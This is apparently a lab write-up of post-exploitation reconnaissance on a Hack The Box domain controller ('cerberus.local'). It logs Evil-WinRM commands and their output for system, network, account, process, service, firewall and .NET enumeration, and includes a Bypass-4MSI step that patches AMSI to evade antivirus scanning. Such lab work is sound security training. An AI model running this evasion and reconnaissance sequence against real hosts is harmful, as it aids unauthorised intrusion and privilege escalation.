System/Kernel


*Evil-WinRM* PS C:\Users\matthew\Documents> systeminfo ; Get-ComputerInfo
Program 'systeminfo.exe' failed to run: Access is denied At line:1 char:1
+ systeminfo ; Get-ComputerInfo
+ ~~~~~~~~~~.
At line:1 char:1
+ systeminfo ; Get-ComputerInfo
+ ~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
 
 
 
WindowsBuildLabEx                                       : 17763.1.amd64fre.rs5_release.180914-1434
WindowsCurrentVersion                                   : 6.3
WindowsEditionId                                        : ServerStandard
WindowsInstallationType                                 : Server
WindowsInstallDateFromRegistry                          : 4/10/2020 5:48:06 PM
WindowsProductId                                        : 00429-00521-62775-AA477
WindowsProductName                                      : Windows Server 2019 Standard
WindowsRegisteredOrganization                           :
WindowsRegisteredOwner                                  : Windows User
WindowsSystemRoot                                       : C:\Windows
WindowsVersion                                          : 1809
OsServerLevel                                           : FullServer
KeyboardLayout                                          :
TimeZone                                                : (UTC-08:00) Pacific Time (US & Canada)
LogonServer                                             :
PowerPlatformRole                                       : Desktop
DeviceGuardSmartStatus                                  : Off
 
*Evil-WinRM* PS C:\Users\matthew\Documents> cmd /c ver
Microsoft Windows [Version 10.0.17763.4010]

Windows Server 2019 Standard 10.0.17763.4010 FullServer Desktop

Networks


*Evil-WinRM* PS C:\Users\matthew\Documents> ipconfig /all ; arp -a ; print route
Windows IP Configuration
 
   Host Name . . . . . . . . . . . . : DC
   Primary Dns Suffix  . . . . . . . : cerberus.local
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : cerberus.local
                                       htb
 
Ethernet adapter vEthernet (Switch1):
 
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Hyper-V Virtual Ethernet Adapter
   Physical Address. . . . . . . . . : 00-15-5D-5F-E8-00
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::e225:edaa:5112:dfc3%6(Preferred)
   IPv4 Address. . . . . . . . . . . : 172.16.22.1(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.240
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 452990301
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2B-5F-1B-88-00-50-56-B4-33-03
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   NetBIOS over Tcpip. . . . . . . . : Enabled
 
Ethernet adapter Ethernet0 3:
 
   Connection-specific DNS Suffix  . : htb
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter #2
   Physical Address. . . . . . . . . : 00-50-56-B9-A9-A0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : dead:beef::138(Preferred)
   Lease Obtained. . . . . . . . . . : Tuesday, January 16, 2024 10:59:40 PM
   Lease Expires . . . . . . . . . . : Wednesday, January 17, 2024 10:29:40 AM
   IPv6 Address. . . . . . . . . . . : dead:beef::c349:4d0f:4db0:880(Preferred)
   Link-local IPv6 Address . . . . . : fe80::2df8:1fb:a85b:f52d%5(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.10.11.205(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%5
                                       10.10.10.2
   DHCPv6 IAID . . . . . . . . . . . : 486559830
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2B-5F-1B-88-00-50-56-B4-33-03
   DNS Servers . . . . . . . . . . . : 127.0.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled
   Connection-specific DNS Suffix Search List :
                                       htb
 
Interface: 10.10.11.205 --- 0x5
  Internet Address      Physical Address      Type
  10.10.10.2            00-50-56-b9-6c-92     dynamic
  10.10.11.255          ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
 
Interface: 172.16.22.1 --- 0x6
  Internet Address      Physical Address      Type
  172.16.22.2           00-15-5d-5f-e8-01     dynamic
  172.16.22.15          ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
Unable to initialize device PRN

Hyper-V Virtual Ethernet Adapter 172.16.22.1

*Evil-WinRM* PS C:\Users\matthew\Documents> netstat -ano | Select-String LIST
 
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       696
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       696
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       696
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       696
  TCP    0.0.0.0:808            0.0.0.0:0              LISTENING       6892
  TCP    0.0.0.0:1500           0.0.0.0:0              LISTENING       6892
  TCP    0.0.0.0:1501           0.0.0.0:0              LISTENING       6892
  TCP    0.0.0.0:2179           0.0.0.0:0              LISTENING       3444
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       696
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       696
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8888           0.0.0.0:0              LISTENING       5524
  TCP    0.0.0.0:9251           0.0.0.0:0              LISTENING       5524
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2544
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       532
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1232
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1604
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       696
  TCP    0.0.0.0:49689          0.0.0.0:0              LISTENING       696
  TCP    0.0.0.0:49690          0.0.0.0:0              LISTENING       696
  TCP    0.0.0.0:49898          0.0.0.0:0              LISTENING       696
  TCP    0.0.0.0:49915          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49920          0.0.0.0:0              LISTENING       2096
  TCP    0.0.0.0:49934          0.0.0.0:0              LISTENING       3156
  TCP    0.0.0.0:49961          0.0.0.0:0              LISTENING       3112
  TCP    10.10.11.205:53        0.0.0.0:0              LISTENING       3156
  TCP    10.10.11.205:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       3156
  TCP    127.0.0.1:32000        0.0.0.0:0              LISTENING       2548
  TCP    127.0.0.1:33308        0.0.0.0:0              LISTENING       2640
  TCP    127.0.0.1:49924        0.0.0.0:0              LISTENING       5524
  TCP    172.16.22.1:53         0.0.0.0:0              LISTENING       3156
  TCP    172.16.22.1:139        0.0.0.0:0              LISTENING       4
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:88                [::]:0                 LISTENING       696
  TCP    [::]:135               [::]:0                 LISTENING       948
  TCP    [::]:389               [::]:0                 LISTENING       696
  TCP    [::]:443               [::]:0                 LISTENING       4
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:464               [::]:0                 LISTENING       696
  TCP    [::]:593               [::]:0                 LISTENING       948
  TCP    [::]:636               [::]:0                 LISTENING       696
  TCP    [::]:808               [::]:0                 LISTENING       6892
  TCP    [::]:1500              [::]:0                 LISTENING       6892
  TCP    [::]:1501              [::]:0                 LISTENING       6892
  TCP    [::]:2179              [::]:0                 LISTENING       3444
  TCP    [::]:3268              [::]:0                 LISTENING       696
  TCP    [::]:3269              [::]:0                 LISTENING       696
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:9389              [::]:0                 LISTENING       2544
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       532
  TCP    [::]:49665             [::]:0                 LISTENING       1232
  TCP    [::]:49666             [::]:0                 LISTENING       1604
  TCP    [::]:49667             [::]:0                 LISTENING       696
  TCP    [::]:49689             [::]:0                 LISTENING       696
  TCP    [::]:49690             [::]:0                 LISTENING       696
  TCP    [::]:49898             [::]:0                 LISTENING       696
  TCP    [::]:49915             [::]:0                 LISTENING       668
  TCP    [::]:49920             [::]:0                 LISTENING       2096
  TCP    [::]:49934             [::]:0                 LISTENING       3156
  TCP    [::]:49961             [::]:0                 LISTENING       3112
  TCP    [::1]:53               [::]:0                 LISTENING       3156
  TCP    [::1]:33308            [::]:0                 LISTENING       2640
  TCP    [dead:beef::138]:53    [::]:0                 LISTENING       3156
  TCP    [dead:beef::c349:4d0f:4db0:880]:53  [::]:0                 LISTENING       3156
  TCP    [fe80::2df8:1fb:a85b:f52d%5]:53  [::]:0                 LISTENING       3156
  TCP    [fe80::e225:edaa:5112:dfc3%6]:53  [::]:0                 LISTENING       3156

0.0.0.0:808 0.0.0.0:1500 0.0.0.0:1501 0.0.0.0:2179 0.0.0.0:8888 0.0.0.0:9251

Users & Groups


*Evil-WinRM* PS C:\Users\matthew\Documents> net users ; ls C:\Users
 
User accounts for \\
 
-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
matthew
The command completed with one or more errors.
 
 
 
    Directory: C:\Users
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/30/2023   2:44 AM                adfs_svc$
d-----        1/30/2023   4:14 AM                adfs_svc$.CERBERUS
d-----       11/29/2022   4:24 AM                Administrator
d-----        1/22/2023  11:22 AM                matthew
d-r---        4/10/2020  10:49 AM                Public

adfs_svc$ adfs_svc$.CERBERUS

*Evil-WinRM* PS C:\Users\matthew\Documents> net localgroup ; net group /DOMAIN
 
Aliases for \\DC
 
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.
 
 
Group Accounts for \\
 
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.

Processes


*Evil-WinRM* PS C:\Users\matthew\Documents> cmd /c tasklist /svc
cmd.exe : ERROR: Access denied
    + CategoryInfo          : NotSpecified: (ERROR: Access denied:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
 
*Evil-WinRM* PS C:\Users\matthew\Documents> ps
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    399      34    13064      22316              2096   0 certsrv
     81       5     2280       3916              1952   0 cmd
    160       9     6668      12876              3640   0 conhost
    139       8     6452      10996              5808   0 conhost
    154       9     6672      12800       0.06   6780   0 conhost
    604      23     2532       5088               424   0 csrss
    177      14     1848       4512               548   1 csrss
    400      33    16624      23556              3112   0 dfsrs
    159       8     1940       6268              3324   0 dfssvc
    265      14     3932      13860              4332   0 dllhost
  10403    7411   129904     128300              3156   0 dns
    532      22    23528      41468               448   1 dwm
     54       6     1624       4400              4032   1 fontdrvhost
     54       7     1652       4436              4360   0 fontdrvhost
    196      10     1652       1628              1856   0 GoogleCrashHandler
    174       9     1736       1332              1884   0 GoogleCrashHandler64
    231      14     2260       3868              1616   0 GoogleUpdate
      0       0       56          8                 0   0 Idle
    206      16     6520      15660              3272   0 inetinfo
    139      12     1952       5776              3244   0 ismserv
   1947      69   318868     282160              5524   0 java
    473      27    11036      48228              5880   1 LogonUI
     47       6     1196       3360               688   0 LsaIso
   2104     193    89624      91476               696   0 lsass
    431      30    37172      47308              2544   0 Microsoft.ActiveDirectory.WebServices
   1027     297   431220     382664              6892   0 Microsoft.IdentityServer.ServiceHost
    235      13     3420      10628              4780   0 msdtc
    376      21     6864      27296              1056   0 OpenWith
    329       9     2720       6768              1004   0 postgres
    393      14     3328      19092              2640   0 postgres
    327       9     2676       6740              2868   0 postgres
    443      11     6600      16856              4204   0 postgres
    329       9     2968      11284              4384   0 postgres
    329       9     3288       7628              5084   0 postgres
    329       9     3632       8024              5088   0 postgres
    328       9     3036       7136              5372   0 postgres
    329       9     3080      10708              5480   0 postgres
    328       9     2996       9144              5484   0 postgres
      0      13      316      14320                92   0 Registry
      0       0      168      13316                48   0 Secure System
    641      15     6236      14052               668   0 services
     53       3      484       1208               340   0 smss
    727      71   279952     193952              5160   0 sqlservr
    135      10     1644       8100              3304   0 sqlwriter
    222      12     1764       7660                 8   0 svchost
    130      16     3444       7668               812   0 svchost
    153       9     1748       6724               824   0 svchost
     90       5      928       4000               888   0 svchost
    779      16     5776      15412               908   0 svchost
    775      19     4204      11164               948   0 svchost
    191      11     1864       8348               964   0 svchost
    238      10     1732       6940               992   0 svchost
    145       7     1324       5920              1028   0 svchost
    262      14     3828       9476              1076   0 svchost
    222       9     2136       7560              1116   0 svchost
    119       8     1328       6132              1136   0 svchost
    372      13    10460      14968              1232   0 svchost
    412      32    11484      20596              1272   0 svchost
    376      19     5232      13500              1352   0 svchost
    256      16     3252      13200              1400   0 svchost
    240      12     2840      12300              1416   0 svchost
    439       9     2804       9060              1428   0 svchost
    122       7     1248       5656              1440   0 svchost
    179      10     1776       8408              1476   0 svchost
    324      10     2552       8644              1532   0 svchost
    163      11     1664       8016              1540   0 svchost
    367      18     5004      14496              1604   0 svchost
    318      13     2108       9140              1636   0 svchost
    185      11     1916       8228              1732   0 svchost
    148       9     1584       6672              1792   0 svchost
    108       7     1136       5220              1804   0 svchost
    266      13     3788      11324              1816   0 svchost
    221      12     2208       9320              1924   0 svchost
    170       9     1932       7168              1960   0 svchost
    189      15     6088      10324              2008   0 svchost
    233      12     2672      12572              2156   0 svchost
    465      17    14960      24300              2220   0 svchost
    472      19     3360      12528              2272   0 svchost
    243      25     3624      12820              2328   0 svchost
    303      20     9284      15728              2340   0 svchost
    206      11     2236       8596              2456   0 svchost
    316      16    16304      19000              2616   0 svchost
    143       9     2980      10640              2700   0 svchost
    171      12     3852      11148              2760   0 svchost
    165      10     1988       7740              2824   0 svchost
    130       7     1288       5888              2928   0 svchost
    179      11     2452      13284              2948   0 svchost
    423      22    17132      31188              3124   0 svchost
    269      13     2488       8076              3204   0 svchost
    326      18     5644      22760              3212   0 svchost
    139       8     1528       6432              3312   0 svchost
    139       9     1588       6728              3340   0 svchost
    234      14     4672      12244              3424   0 svchost
    296      17     3800      14672              3456   0 svchost
    170      10     2144      13168              3532   0 svchost
    239      13     2256       8436              3688   0 svchost
    409      26     3492      13392              4148   0 svchost
    171       9     3044       7844              6968   0 svchost
   1962       0      192        152                 4   0 System
    214      16     2440      10776              4024   0 vds
    177      11     3248      12028              3476   0 VGAuthService
    151       8     1688       7332              3404   0 vm3dservice
    144      10     1784       7772              3924   1 vm3dservice
    140       9     1664       7604              6928   1 vm3dservice
    178      10     2460       9960              4508   0 vmcompute
    629      25    43856      30616              3444   0 vmms
    410      23    11412      23712              3416   0 vmtoolsd
    403      19     9480      20952              3028   0 vmwp
    176      11     1396       6484               532   0 wininit
    246      12     2544      18044               628   1 winlogon
    395      20    24924      35348              2036   0 WmiPrvSE
    324      16    18068      27152              4952   0 WmiPrvSE
    286      16     3492      12096              2548   0 wrapper
   3114      36   103816     130704       1.78   5276   0 wsmprovhost

certsrv dns GoogleCrashHandler GoogleCrashHandler64 GoogleUpdate java OpenWith postgres sqlservr sqlwriter vmcompute vmms vmwp

Services


*Evil-WinRM* PS C:\Users\matthew\Documents> Bypass-4MSI
Info: Patching 4MSI, please be patient...
[+] Success!
 
 
*Evil-WinRM* PS C:\Users\matthew\Documents> services
Path                                                                                                                                                   Privileges Service                     
----                                                                                                                                                   ---------- -------                     
c:\Windows\ADFS\Microsoft.IdentityServer.ServiceHost.exe                                                                                                    False adfssrv                     
"c:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin\wrapper.exe" -s "C:\Program Files (x86)\ManageEngine\ADSelfService Plus\conf\wrapper.conf"      False ADSelfServicePlus           
c:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe                                                                                                   False ADWS                        
"c:\Program Files\Google\Chrome\Application\110.0.5481.178\elevation_service.exe"                                                                           False GoogleChromeElevationService
"c:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc                                                                                                False gupdate                     
"c:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc                                                                                             False gupdatem                    
c:\Windows\WID\Binn\sqlservr.exe -SMSWIN8.SQLWID -sMICROSOFT##WID                                                                                           False MSSQL$MICROSOFT##WID        
c:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe                                                                                                True NetTcpPortSharing           
c:\Windows\SysWow64\perfhost.exe                                                                                                                            False PerfHost                    
"c:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"                                                                                  False Sense                       
c:\Windows\servicing\TrustedInstaller.exe                                                                                                                   False TrustedInstaller            
"c:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"                                                                                      False VGAuthService               
"c:\Program Files\VMware\VMware Tools\vmtoolsd.exe"                                                                                                         False VMTools                     
"c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2301.6-0\NisSrv.exe"                                                                                True WdNisSvc                    
c:\Windows\WID\Binn\sqlwriter.exe -w                                                                                                                        False WIDWriter                   
"c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2301.6-0\MsMpEng.exe"                                                                               True WinDefend                   
"c:\Program Files\Windows Media Player\wmpnetwk.exe"                                                                                                        False WMPNetworkSvc               

Tasks


*Evil-WinRM* PS C:\Users\matthew\Documents> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State 
 
Cannot connect to CIM server. Access denied 
At line:1 char:1
+ Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft  ...
+ ~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (MSFT_ScheduledTask:String) [Get-ScheduledTask], CimJobException
    + FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-ScheduledTask
 
*Evil-WinRM* PS C:\Users\matthew\Documents> schtasks /QUERY /FO TABLE | findstr /v /i "\Microsoft" | findstr /v /i "access level" | findstr /v /i "system32"
Program 'schtasks.exe' failed to run: Access is deniedAt line:1 char:1
+ schtasks /QUERY /FO TABLE | findstr /v /i "\Microsoft" | findstr /v / ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ schtasks /QUERY /FO TABLE | findstr /v /i "\Microsoft" | findstr /v / ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

Firewall & AV


*Evil-WinRM* PS C:\Users\matthew\Documents> netsh firewall show config
 
Domain profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Disable
 
Service configuration for Domain profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          File and Printer Sharing
 
Allowed programs configuration for Domain profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------
 
Port configuration for Domain profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------
 
ICMP configuration for Domain profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   8     Allow inbound echo request
 
Standard profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Disable
 
Service configuration for Standard profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          File and Printer Sharing
Enable   Yes         Network Discovery
 
Allowed programs configuration for Standard profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------
 
Port configuration for Standard profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------
 
ICMP configuration for Standard profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   8     Allow inbound echo request
 
Log configuration:
-------------------------------------------------------------------
File location   = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size   = 4096 KB
Dropped packets = Disable
Connections     = Disable
 
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .

Firewall is enabled on both the domain and standard profiles, with no allowed programs or ports configured beyond File and Printer Sharing, Network Discovery and inbound ICMP echo

*Evil-WinRM* PS C:\Users\matthew\Documents> Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property ExclusionPath
 
Cannot connect to CIM server. Access denied 
At line:1 char:1
+ Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property Exc ...
+ ~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (MSFT_MpComputerStatus:String) [Get-MpComputerStatus], CimJobException
    + FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-MpComputerStatus
Cannot connect to CIM server. Access denied 
At line:1 char:24
+ Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property Exc ...
+                        ~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (MSFT_MpPreference:String) [Get-MpPreference], CimJobException
    + FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-MpPreference

Session Architecture


*Evil-WinRM* PS C:\Users\matthew\Documents> [Environment]::Is64BitProcess
True

Installed .NET Frameworks


*Evil-WinRM* PS C:\Users\matthew\Documents> cmd /c dir /A:D C:\Windows\Microsoft.NET\Framework ; cmd /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" ; cmd /c reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
 Volume in drive C has no label.
 Volume Serial Number is D9B1-79BF
 
 Directory of C:\Windows\Microsoft.NET\Framework
 
09/14/2018  11:19 PM    <DIR>          .
09/14/2018  11:19 PM    <DIR>          ..
09/14/2018  11:19 PM    <DIR>          v1.0.3705
09/14/2018  11:19 PM    <DIR>          v1.1.4322
09/14/2018  11:19 PM    <DIR>          v2.0.50727
01/16/2024  11:10 PM    <DIR>          v4.0.30319
               0 File(s)              0 bytes
               6 Dir(s)   6,371,500,032 bytes free
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\CDF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4.0
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\CDF
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\CDF\v4.0
    HttpNamespaceReservationInstalled    REG_DWORD    0x1
    NetTcpPortSharingInstalled    REG_DWORD    0x1
    NonHttpActivationInstalled    REG_DWORD    0x1
    SMSvcHostPath    REG_SZ    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
    WMIInstalled    REG_DWORD    0x1
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client
    CBS    REG_DWORD    0x1
    Install    REG_DWORD    0x1
    InstallPath    REG_SZ    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
    Release    REG_DWORD    0x70bf6
    Servicing    REG_DWORD    0x0
    TargetVersion    REG_SZ    4.0.0
    Version    REG_SZ    4.7.03190
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client\1033
    CBS    REG_DWORD    0x1
    Install    REG_DWORD    0x1
    Release    REG_DWORD    0x70bf6
    Servicing    REG_DWORD    0x0
    TargetVersion    REG_SZ    4.0.0
    Version    REG_SZ    4.7.03190
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full
    CBS    REG_DWORD    0x1
    Install    REG_DWORD    0x1
    InstallPath    REG_SZ    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
    Release    REG_DWORD    0x70bf6
    Servicing    REG_DWORD    0x0
    TargetVersion    REG_SZ    4.0.0
    Version    REG_SZ    4.7.03190
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full\1033
    CBS    REG_DWORD    0x1
    Install    REG_DWORD    0x1
    Release    REG_DWORD    0x70bf6
    Servicing    REG_DWORD    0x0
    TargetVersion    REG_SZ    4.0.0
    Version    REG_SZ    4.7.03190
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4.0
    (Default)    REG_SZ    deprecated
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4.0\Client
    Install    REG_DWORD    0x1
    Version    REG_SZ    4.0.0.0

.NET 4.7.03190